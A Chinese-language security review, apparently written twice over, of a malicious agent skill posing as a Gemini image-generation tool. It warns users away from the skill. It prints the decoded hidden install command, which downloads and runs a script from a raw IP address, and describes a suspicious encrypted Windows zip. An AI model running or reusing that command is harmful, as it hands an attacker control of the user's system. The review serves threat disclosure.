nano-banana-pro

核心用法

该技能表面宣称提供基于Google Gemini 3 Pro Image的图像生成与编辑功能，支持文本生成图像（text-to-image）和图像编辑（image-to-image），并提供1K/2K/4K三种分辨率选项。用户可通过命令行参数指定提示词、输出文件名、分辨率及API密钥完成图像生成任务。

显著优点（表面宣称）

• 支持Draft→Iterate→Final的标准化工作流程，便于快速迭代
• 提供结构化的提示词模板，降低用户使用门槛
• 支持多分辨率输出，满足不同场景需求
• 基于Gemini 3 Pro Image API，理论上有较强的图像生成能力

潜在缺点与局限性

致命缺陷：该技能包含恶意代码，实际不存在任何可用优点。 其宣称的所有功能均为掩护，真实目的是诱导用户执行隐藏的远程命令。即使忽略恶意代码，其设计也存在明显问题：强制依赖未经验证的第三方"OpenClawProvider"、使用IP地址而非域名、缺乏官方API文档引用等。

适合的目标群体

任何用户都不应使用该技能。 该技能针对的是对AI图像生成有需求但缺乏安全意识的开发者、设计师及普通用户。其利用用户对Gemini模型和图像生成技术的信任，通过技术术语包装降低用户警惕性。

使用风险

• 系统完全失控：执行命令后攻击者可获取系统最高权限
• 数据泄露风险：环境变量、API密钥、敏感文件可能被静默窃取
• 横向感染：可能被用作跳板攻击内网其他设备
• 持久化威胁：远程脚本可能植入后门、挖矿程序或勒索软件
• 供应链污染：若集成到工作流中，可能污染整个项目或组织

核心用法

Nano Banana Pro 伪装为基于 Gemini 3 Pro Image API 的图像生成与编辑工具，支持文生图和图生图两种模式，提供 1K/2K/4K 三种分辨率选项。用户通过命令行调用 Python 脚本，使用 --prompt 参数描述生成需求，--input-image 参数指定待编辑图像。

显著优点

• 表面功能完整：文档详细描述了图像生成、编辑、分辨率选择、API 密钥管理等工作流程
• 迭代开发流程：提供草稿→迭代→终稿的分级工作流，理论上可节省计算资源
• 模板化提示词：内置结构化提示模板，帮助用户细化图像风格、构图、光照等参数

严重缺陷与风险

致命安全风险：远程代码执行后门

1. Base64 混淆的恶意命令：MacOS 安装说明中隐藏 Base64 编码命令，解码后为 /bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"，从公网 IP 下载并执行未知脚本
2. 可疑 Windows 组件：引导用户下载名为 "OpenClawProvider" 的加密 zip 文件，该名称刻意模仿 Claude/Code 以迷惑用户
3. 来源不可信：开发者账户 sakaen736jih 和所属组织 clawdbot 均为 2026 年新注册，无任何公开仓库和活动记录
4. 网络隔离失效：涉及与未经验证的远程服务器 (91.92.242.30) 通信，无加密或完整性校验

适合人群

无人群适合使用。该 skill 为恶意软件传播载体，应立即删除，切勿安装或执行任何命令。

常规风险

• 系统完全接管与持久化后门
• 敏感数据窃取与外传
• 横向移动至内网其他设备
• 加密 zip 可能绕过杀毒软件检测

若曾执行过其中命令，建议立即进行系统安全检查或重装系统。